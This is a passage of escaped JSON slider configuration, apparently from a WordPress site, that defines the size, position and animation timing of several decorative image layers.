toResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1670,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1670,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":490,\"start\":3000,\"startRelative\":530,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Brown\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic6.png\",\"imageId\":3224},\"size\":{\"width\":{\"d\":{\"v\":\"1045px\",\"e\":true},\"n\":{\"v\":\"719px\",\"e\":true},\"t\":{\"v\":\"719px\"},\"m\":{\"v\":\"481px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"715px\",\"e\":true},\"n\":{\"v\":\"492px\",\"e\":true},\"t\":{\"v\":\"492px\"},\"m\":{\"v\":\"329px\",\"e\":true}},\"originalWidth\":1191,\"originalHeight\":815,\"aspectRatio\":{\"d\":{\"v\":1.46134969325153374342107781558297574520111083984375},\"n\":{\"v\":1.46134969325153374342107781558297574520111083984375},\"t\":{\"v\":1.46134969325153374342107781558297574520111083984375},\"m\":{\"v\":1.46134969325153374342107781558297574520111083984375}}},\"position\":{\"x\":{\"d\":{\"v\":\"-8px\",\"e\":true},\"n\":{\"v\":\"391px\",\"e\":true},\"t\":{\"v\":\"74px\",\"e\":true},\"m\":{\"v\":\"-169px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"173px\",\"e\":true},\"n\":{\"v\":\"26px\",\"e\":true},\"t\":{\"v\":\"141px\",\"e\":true},\"m\":{\"v\":\"79px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":490},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1770,\"start\":490,\"startRelative\":490},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1770,\"start\":490,\"startRelative\":490},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":480,\"start\":3000,\"startRelative\":740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Rose\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic7.png\",\"imageId\":3223},\"size\":{\"width\":{\"d\":{\"v\":\"851px\",\"e\":true},\"n\":{\"v\":\"500px\",\"e\":true},\"t\":{\"v\":\"607px\",\"e\":true},\"m\":{\"v\":\"345px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"722px\",\"e\":true},\"n\":{\"v\":\"424px\",\"e\":true},\"t\":{\"v\":\"515px\",\"e\":true},\"m\":{\"v\":\"293px\",\"e\":true}},\"originalWidth\":851,\"originalHeight\":722,\"aspectRatio\":{\"d\":{\"v\":1.178670360110803283504310456919483840465545654296875},\"n\":{\"v\":1.178670360110803283504310456919483840465545654296875},\"t\":{\"v\":1.178670360110803283504310456919483840465545654296875},\"m\":{\"v\":1.178670360110803283504310456919483840465545654296875}}},\"position\":{\"x\":{\"d\":{\"v\":\"-75px\",\"e\":true},\"n\":{\"v\":\"441px\",\"e\":true},\"t\":{\"v\":\"-123px\",\"e\":true},\"m\":{\"v\":\"-139px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"105px\",\"e\":true},\"n\":{\"v\":\"79px\",\"e\":true},\"t\":{\"v\":\"99px\",\"e\":true},\"m\":{\"v\":\"81px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":590},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1670,\"start\":590,\"startRelative\":590},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1670,\"start\":590,\"startRelative\":590},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":460,\"start\":3000,\"startRelative\":740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"7\":{\"text\":\"Image 7\",\"alias\":\"Cream\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic4-1.png\",\"imageId\":3231},\"size\":{\"width\":{\"d\":{\"v\":\"878px\",\"e\":true},\"n\":{\"v\":\"516px\",\"e\":true},\"t\":{\"v\":\"516px\",\"e\":true},\"m\":{\"v\":\"356px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"296px\",\"e\":true},\"n\":{\"v\":\"174px\",\"e\":true},\"t\":{\"v\":\"174px\",\"e\":true},\"m\":{\"v\":\"120px\",\"e\":true}},\"originalWidth\":878,\"originalHeight\":296,\"aspectRatio\":{\"d\":{\"v\":2.966216216216216228218627293244935572147369384765625},\"n\":{\"v\":2.966216216216216228218627293244935572147369384765625},\"t\":{\"v\":2.966216216216216228218627293244935572147369384765625},\"m\":{\"v\":2.966216216216216228218627293244935572147369384765625}}},\"position\":{\"x\":{\"d\":{\"v\":\"-90px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"32px\",\"e\":true},\"m\":{\"v\":\"-67px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"105px\",\"e\":true},\"n\":{\"v\":\"212px\",\"e\":true},\"t\":{\"v\":\"298px\",\"e\":true},\"m\":{\"v\":\"83px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":690},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1580,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1580,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":480,\"start\":3000,\"startRelative\":730,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"8\":{\"text\":\"Image 8\",\"alias\":\"Little leaf\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic12.png\",\"imageId\":3232},\"size\":{\"width\":{\"d\":{\"v\":\"246px\",\"e\":true},\"n\":{\"v\":\"123px\",\"e\":true},\"t\":{\"v\":\"123px\",\"e\":true},\"m\":{\"v\":\"86px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"50px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"35px\",\"e\":true}},\"originalWidth\":246,\"originalHeight\":100,\"aspectRatio\":{\"d\":{\"v\":2.45999999999999996447286321199499070644378662109375},\"n\":{\"v\":2.45999999999999996447286321199499070644378662109375},\"t\":{\"v\":2.45999999999999996447286321199499070644378662109375},\"m\":{\"v\":2.45999999999999996447286321199499070644378662109375}}},\"position\":{\"x\":{\"d\":{\"v\":\"241px\",\"e\":true},\"n\":{\"v\":\"351px\",\"e\":true},\"t\":{\"v\":\"174px\",\"e\":true},\"m\":{\"v\":\"158px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"71px\",\"e\":true},\"n\":{\"v\":\"286px\",\"e\":true},\"t\":{\"v\":\"87px\",\"e\":true},\"m\":{\"v\":\"77px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":850},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1900,\"start\":850,\"startRelative\":850},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 